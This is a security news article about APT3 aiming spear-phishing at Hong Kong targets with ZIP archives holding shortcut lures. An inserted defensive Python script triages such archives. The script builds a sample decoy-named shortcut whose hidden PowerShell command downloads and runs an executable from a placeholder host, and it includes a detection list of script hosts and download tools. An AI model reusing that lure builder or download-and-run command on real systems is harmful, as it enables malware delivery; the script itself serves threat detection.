China-Linked APT3 Group Focuses Attacks on Hong Kong

A China-linked cyberespionage group has shifted its attention from the United States to Hong Kong, where it has targeted more than a dozen organizations over the past year.

FireEye reported last week that APT3, a threat actor believed to be sponsored by China, had targeted two Hong Kong government agencies in early August. The attackers had used spear-phishing emails to trick recipients into installing what the security firm said was a previously unseen piece of malware.

APT3, also known as UPS Team, Gothic Panda, Buckeye and TG-0110, has been active since at least 2009. The group's attacks have often relied on exploits for zero-day vulnerabilities and for flaws that had only recently been patched.

Many of the group’s earlier attacks focused on the United States, including government organizations. However, Symantec, which tracks the threat actor as Buckeye, noticed last year that the hackers had become increasingly interested in Hong Kong.

Symantec observed some 82 APT3 victims since the beginning of 2015, but its researchers pointed out that the group had cast a wide net and that only 17 of these organizations were persistently targeted. That list of 17 included 13 organizations in Hong Kong, three in the U.S. and one in the U.K.

While there were some periods last year when all three countries were being targeted, researchers noticed that the U.K. and the U.S. were no longer attacked from March 2016 onward.

In the recent attacks observed by Symantec, mostly aimed at political entities in Hong Kong, APT3 used ZIP archives containing Windows shortcut (.lnk) files to deliver a backdoor that the security firm calls Pirpi.


The infection method appears to be the same in the attacks observed by FireEye: a ZIP archive contains a shortcut file which, when opened, downloads the malware. However, the early August attacks spotted by FireEye did not leverage Pirpi, which has been around since 2010 and which the company tracks as Backdoor.APT.CookieCutter. Instead, the security firm said they involved a new malware tool.
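The delivery chain described above (a ZIP attachment carrying a .lnk that fetches the next stage) is cheap to triage at the mail gateway because the shortcut format is fully documented in MS-SHLLINK: the command the shortcut runs sits in plain UTF-16 inside the file. The following is an added example, not code from Symantec, FireEye or the APT3 tooling. It parses the shortcut header and StringData section, lists any .lnk entries in an archive, and flags ones whose target or arguments point at a scripting host or a URL. The sample archive, the decoy filename and the download command in it are constructed here for illustration; the hostname is a reserved `.invalid` name.

```python
"""Triage a ZIP attachment for shortcut (.lnk) lures that launch a downloader.
Added example; the archive built by sample_archive() is constructed, not a real lure."""
import io
import struct
import zipfile

# LinkCLSID 00021401-0000-0000-C000-000000000046 as stored on disk (mixed-endian GUID)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each only if its flag bit is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON)]
# Hosts a shortcut lure typically chains into; list is illustrative, not exhaustive
SUSPICIOUS_TOKENS = ("powershell", "cmd.exe", "mshta", "rundll32", "regsvr32",
                     "wscript", "cscript", "certutil", "bitsadmin", "http")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link file (skips IDList and LinkInfo)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                             # fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                              # IDListSize (2) + items + terminal
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                            # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def is_suspicious(lnk: dict) -> bool:
    """True if the shortcut's target or arguments reference a script host or a URL."""
    cmd = (lnk.get("relative_path", "") + " " + lnk.get("arguments", "")).lower()
    return any(tok in cmd for tok in SUSPICIOUS_TOKENS)


def scan_zip(zip_bytes: bytes) -> list:
    """One finding per .lnk entry in the archive, with what the shortcut would run."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            lnk = parse_lnk(zf.read(info))
            findings.append({
                "entry": info.filename,
                "double_extension": info.filename.count(".") > 1,   # e.g. Notice.pdf.lnk
                "target": lnk.get("relative_path", ""),
                "arguments": lnk.get("arguments", ""),
                "suspicious": is_suspicious(lnk),
            })
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Build a minimal Unicode shortcut (constructed sample; no IDList, LinkInfo or ExtraData)."""
    flags = HAS_REL_PATH | HAS_WORK_DIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(76 - len(header))                    # remaining header fields zeroed
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


def sample_archive() -> bytes:
    """Constructed archive imitating the lure: decoy-named shortcut that fetches a second stage."""
    lure = build_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"%TEMP%",
        '-w hidden -c "iwr http://example.invalid/s2.exe -o $env:TEMP\\s.exe; start $env:TEMP\\s.exe"')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Election_Notice.pdf.lnk", lure)
        zf.writestr("readme.txt", "decoy text")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(sample_archive()):
        print(f)
```

Two caveats for production use. First, real shortcuts written by Explorer also carry an IDList, a LinkInfo block and ExtraData blocks; the parser above skips the first two by their size fields but does not walk ExtraData, so a lure that puts its real target in an EnvironmentVariableDataBlock (and leaves the StringData path looking harmless) would need that block parsed as well. Second, the token list is a triage heuristic, not a verdict: a double extension plus any .lnk in an inbound archive is usually reason enough to quarantine, independent of what the command line says.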

This suggests that China may have stepped up its attacks just before the Hong Kong legislative elections that took place on September 4. The Chinese government has been increasingly concerned about Hong Kong’s push for more political independence.

In addition to Pirpi, Symantec observed APT3 using various other tools, including keyloggers, remote command execution tools, system information harvesting tools, and browser password stealers. Researchers said the group appears to be focusing on file and print servers, which suggests they are mainly interested in stealing documents.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
